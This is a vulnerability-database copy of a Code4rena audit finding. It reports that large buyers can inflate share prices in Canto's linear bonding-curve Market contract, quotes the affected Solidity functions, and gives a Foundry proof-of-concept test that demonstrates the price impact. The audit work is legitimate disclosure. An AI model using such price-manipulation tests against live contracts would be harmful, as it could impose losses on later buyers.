Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
code423n4Code4renaCODE423N4:2023-11-CANTO-FINDINGS-ISSUES-467
HistoryNov 17, 2023 - 12:00 a.m.

Price can be easily inflated/deflated by large depositors in the Market contract

2023-11-1700:00:00
Code4rena
github.com
2
market contract manipulation
token price inflation
security vulnerability

7.1 High

AI Score

Confidence

Low

JSON

Lines of code
<https://github.com/code-423n4/2023-11-canto/blob/335930cd53cf9a137504a57f1215be52c6d67cb3/1155tech-contracts/src/bonding_curve/LinearBondingCurve.sol#L21-L22&gt;

Vulnerability details

Impact

An attacker can manipulate/inflate market prices by donating/buying large amounts of tokens which can negatively impact subsequent transactions.

For example, an attacker who executes a large buy order can significantly increase the price of shares, causing other participants to pay an inflated price for the same shares. This will have greater effect especially if the attacker is an early buyer.

This will cause loss of trust in the protocol and potential loss of funds for subsequent users.

Proof of Concept

The problem arises due to the linear increases in share prices based on the token supply for each share in the Market contract.

After buying, the token count increases :

    function buy(uint256 _id, uint256 _amount) external {
        require(shareData[_id].creator != msg.sender, "Creator cannot buy");
        (uint256 price, uint256 fee) = getBuyPrice(_id, _amount); // Reverts for non-existing ID
        SafeERC20.safeTransferFrom(token, msg.sender, address(this), price + fee);
        uint256 rewardsSinceLastClaim = _getRewardsSinceLastClaim(_id);
        // Split the fee among holder, creator and platform
        _splitFees(_id, fee, shareData[_id].tokensInCirculation);
        rewardsLastClaimedValue[_id][msg.sender] = shareData[_id].shareHolderRewardsPerTokenScaled;

@&gt;      shareData[_id].tokenCount += _amount;
        shareData[_id].tokensInCirculation += _amount;
        tokensByAddress[_id][msg.sender] += _amount;

        if (rewardsSinceLastClaim &gt; 0) {
            SafeERC20.safeTransfer(token, msg.sender, rewardsSinceLastClaim);
        }
        emit SharesBought(_id, msg.sender, _amount, price, fee);
    }

Which in turn increase price and fee for the subsequent buys :

    function getPriceAndFee(uint256 shareCount, uint256 amount)
        external
        view
        override
        returns (uint256 price, uint256 fee)
    {
        for (uint256 i = shareCount; i &lt; shareCount + amount; i++) {
            uint256 tokenPrice = priceIncrease * i;
@&gt;          price += tokenPrice;
@&gt;          fee += (getFee(i) * tokenPrice) / 1e18;
        }
    }

POC

This attack can be demonstrated as follows. To execute the test : forge test --mt testDonationAttack -vv

    function testDonationAttack() public {
        testCreateNewShare();

        address attacker = makeAddr("Attacker"); 
        address toto = makeAddr("Toto");
        token.mint(attacker, 10000 ether);
        token.mint(alice, 1000 ether);
        token.mint(toto, 1000 ether);

        // Alice's buy order goes through for a premium
        uint256 balanceOfAliceBefore = token.balanceOf(alice);
        vm.prank(alice);
        token.approve(address(market), 1 ether);
        vm.prank(alice);
        market.buy(1, 10);
        // console.log(token.balanceOf(alice));

        uint256 balanceOfAliceAfter = token.balanceOf(alice);
        // Costs 0.6 ether to buy 1 share
        console.logInt(int256(balanceOfAliceAfter) -int256(balanceOfAliceBefore)); // -57599999999999998

        // 
        uint256 balanceOfAttackerBefore = token.balanceOf(attacker);
        vm.prank(attacker);
        token.approve(address(market), 1000 ether);
        vm.prank(attacker);
        market.buy(1, 1000);
        console.log(token.balanceOf(attacker));

        uint256 balanceOfTotoBefore = token.balanceOf(toto);
        vm.prank(toto);
        token.approve(address(market), 11 ether);
        vm.prank(toto);
        market.buy(1, 10);
        // console.log(token.balanceOf(toto));

        uint256 balanceOfTotoAfter = token.balanceOf(toto);
        // Costs &gt; 10 ether to buy same number of shares
        console.logInt(int256(balanceOfTotoAfter) -int256(balanceOfTotoBefore)); // -10267833333333333327
    }

Tools Used

Manual review + foundry

Recommended Mitigation Steps

Consider the following changes

  • Implement a non-linear pricing curve
  • Limit the size of transactions
  • After creating a new share, add initial funds to make it harder for early buyers to manipulate the price. You can affect those early tokens to address(0) to enable share dilution in the same way as Uniswap.

Assessed type

Other

The text was updated successfully, but these errors were encountered:

All reactions

7.1 High

AI Score

Confidence

Low

JSON